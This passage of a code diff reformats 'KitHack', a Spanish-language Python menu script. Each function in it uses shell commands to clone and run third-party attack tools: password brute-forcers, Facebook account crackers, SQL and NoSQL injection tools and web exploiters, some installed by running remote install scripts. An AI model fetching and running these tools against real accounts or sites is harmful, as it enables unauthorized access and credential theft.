Done.{1}\nHerramienta guardada en {2}/tools/Passwords/SocialBox".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd SocialBox && bash SocialBox.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd SocialBox && bash SocialBox.sh') + if not os.path.isdir("tools/Passwords/SocialBox"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Passwords && git clone https://github.com/TunisianEagles/SocialBox.git && cd SocialBox && chmod +x SocialBox.sh && chmod +x install-sb.sh && bash install-sb.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/SocialBox" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd SocialBox && bash SocialBox.sh" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd SocialBox && bash SocialBox.sh" + ) + def JohnTheRipper(): - if not os.path.isdir('tools/Passwords/JohnTheRipper'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Passwords && mkdir JohnTheRipper && cd JohnTheRipper && wget http://www.openwall.com/john/j/john-1.8.0.tar.gz && tar -xzvf john-1.8.0.tar.gz && cd john-1.8.0/src/ && make clean generic') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/JohnTheRipper".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('john') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('john') + if not os.path.isdir("tools/Passwords/JohnTheRipper"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Passwords && mkdir JohnTheRipper && cd JohnTheRipper && wget http://www.openwall.com/john/j/john-1.8.0.tar.gz && tar -xzvf john-1.8.0.tar.gz && cd john-1.8.0/src/ && make clean generic" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/JohnTheRipper" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("john") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("john") + def Hashcat(): - if not os.path.isdir('tools/Passwords/hashcat'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Passwords && git clone https://github.com/hashcat/hashcat.git && cd hashcat && make && make install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/hashcat".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('hashcat -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('hashcat -h') + if not os.path.isdir("tools/Passwords/hashcat"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Passwords && git clone https://github.com/hashcat/hashcat.git && cd hashcat && make && make install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/hashcat" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("hashcat -h") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("hashcat -h") + def Brutedum(): - if not os.path.isdir('tools/Passwords/Brutedum'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt install python3 && cd tools && cd Passwords && git clone https://github.com/GitHackTools/BruteDum.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/Brutedum".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd Brutedum && python3 brutedum.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd Brutedum && python3 brutedum.py') + if not os.path.isdir("tools/Passwords/Brutedum"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt install python3 && cd tools && cd Passwords && git clone https://github.com/GitHackTools/BruteDum.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/Brutedum" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd Brutedum && python3 brutedum.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd Brutedum && python3 brutedum.py" + ) + def Facebash(): - if not os.path.isdir('tools/Passwords/facebash'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Passwords && git clone https://github.com/thelinuxchoice/facebash && cd facebash && chmod +x * && bash install.sh && service tor start') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/facebash".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd facebash && bash facebash.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd facebash && bash facebash.sh') + if not os.path.isdir("tools/Passwords/facebash"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Passwords && git clone https://github.com/thelinuxchoice/facebash && cd facebash && chmod +x * && bash install.sh && service tor start" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/facebash" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd facebash && bash facebash.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd facebash && bash facebash.sh") + def Brutespray(): - if not os.path.isdir('tools/Passwords/brutespray'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Passwords && git clone https://github.com/x90skysn3k/brutespray.git && cd brutespray && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/brutespray".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd brutespray && python brutespray.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd brutespray && python brutespray.py') + if not os.path.isdir("tools/Passwords/brutespray"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Passwords && git clone https://github.com/x90skysn3k/brutespray.git && cd brutespray && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/brutespray" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd brutespray && python brutespray.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd brutespray && python brutespray.py" + ) + def Pupi(): - if not os.path.isdir('tools/Passwords/PUPI'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt install python3 && cd tools && cd Passwords && git clone https://github.com/mIcHyAmRaNe/PUPI.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/PUPI".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd PUPI && python3 pupi.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd PUPI && python3 pupi.py') + if not os.path.isdir("tools/Passwords/PUPI"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt install python3 && cd tools && cd Passwords && git clone https://github.com/mIcHyAmRaNe/PUPI.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/PUPI" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Passwords && cd PUPI && python3 pupi.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Passwords && cd PUPI && python3 pupi.py") + def B4rbrute(): - if not os.path.isdir('tools/Passwords/b4r-brute'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Passwords && git clone https://github.com/b4rc0d37/b4r-brute.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/b4r-brute".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd b4r-brute && python b4r-brute.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd b4r-brute && python b4r-brute.py') + if not os.path.isdir("tools/Passwords/b4r-brute"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Passwords && git clone https://github.com/b4rc0d37/b4r-brute.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/b4r-brute" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd b4r-brute && python b4r-brute.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Passwords && cd b4r-brute && python b4r-brute.py" + ) + def FbHack(): - if not os.path.isdir('tools/Passwords/fb-hack'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Passwords && git clone https://github.com/mirzaaltaf/fb-hack.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/fb-hack".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd fb-hack && python fb.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Passwords && cd fb-hack && python fb.py') - -#Tools Web + if not os.path.isdir("tools/Passwords/fb-hack"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Passwords && git clone https://github.com/mirzaaltaf/fb-hack.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Passwords/fb-hack" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Passwords && cd fb-hack && python fb.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Passwords && cd fb-hack && python fb.py") + + +# Tools Web + + def SQLmap(): - if not os.path.isdir('tools/Web/sqlmap-dev'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/sqlmap-dev".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd sqlmap-dev && python sqlmap.py -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd sqlmap-dev && python sqlmap.py -h') + if not os.path.isdir("tools/Web/sqlmap-dev"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/sqlmap-dev" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd sqlmap-dev && python sqlmap.py -h") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd sqlmap-dev && python sqlmap.py -h") + def XAttacker(): - if not os.path.isdir('tools/Web/XAttacker'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/Moham3dRiahi/XAttacker.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/XAttacker".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd XAttacker && perl XAttacker.pl') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd XAttacker && perl XAttacker.pl') + if not os.path.isdir("tools/Web/XAttacker"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/Moham3dRiahi/XAttacker.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/XAttacker" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd XAttacker && perl XAttacker.pl") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd XAttacker && perl XAttacker.pl") + def Fuxploider(): - if not os.path.isdir('tools/Web/fuxploider'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install python3-pip && cd tools && cd Web && git clone https://github.com/almandin/fuxploider.git && cd fuxploider && pip3 install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/fuxploider".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd fuxploider && python3 fuxploider.py -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd fuxploider && python3 fuxploider.py -h') + if not os.path.isdir("tools/Web/fuxploider"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt-get install python3-pip && cd tools && cd Web && git clone https://github.com/almandin/fuxploider.git && cd fuxploider && pip3 install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/fuxploider" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd fuxploider && python3 fuxploider.py -h" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd fuxploider && python3 fuxploider.py -h" + ) + def Wordpresscan(): - if not os.path.isdir('tools/Web/Wordpresscan'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/swisskyrepo/Wordpresscan.git && cd Wordpresscan && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/Wordpresscan".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd Wordpresscan && python wordpresscan.py -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd Wordpresscan && python wordpresscan.py -h') + if not os.path.isdir("tools/Web/Wordpresscan"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/swisskyrepo/Wordpresscan.git && cd Wordpresscan && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/Wordpresscan" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd Wordpresscan && python wordpresscan.py -h" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd Wordpresscan && python wordpresscan.py -h" + ) + def SiteBroker(): - if not os.path.isdir('tools/Web/SiteBroker'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/Anon-Exploiter/SiteBroker.git && cd SiteBroker && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/SiteBroker".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd SiteBroker && python3 SiteBroker.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd SiteBroker && python3 SiteBroker.py') + if not os.path.isdir("tools/Web/SiteBroker"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/Anon-Exploiter/SiteBroker.git && cd SiteBroker && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/SiteBroker" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd SiteBroker && python3 SiteBroker.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd SiteBroker && python3 SiteBroker.py") + def NoSQLMap(): - if not os.path.isdir('tools/Web/NoSQLMap'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/codingo/NoSQLMap.git && cd NoSQLMap && python setup.py install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/NoSQLMap".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd NoSQLMap && python nosqlmap.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd NoSQLMap && python nosqlmap.py') + if not os.path.isdir("tools/Web/NoSQLMap"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/codingo/NoSQLMap.git && cd NoSQLMap && python setup.py install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/NoSQLMap" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd NoSQLMap && python nosqlmap.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd NoSQLMap && python nosqlmap.py") + def SqliScanner(): - if not os.path.isdir('tools/Web/sqli-scanner'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/the-c0d3r/sqli-scanner.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/sqli-scanner".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd sqli-scanner && python sqli-scanner.py -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd sqli-scanner && python sqli-scanner.py -h') + if not os.path.isdir("tools/Web/sqli-scanner"): + print("\n{0}[*] 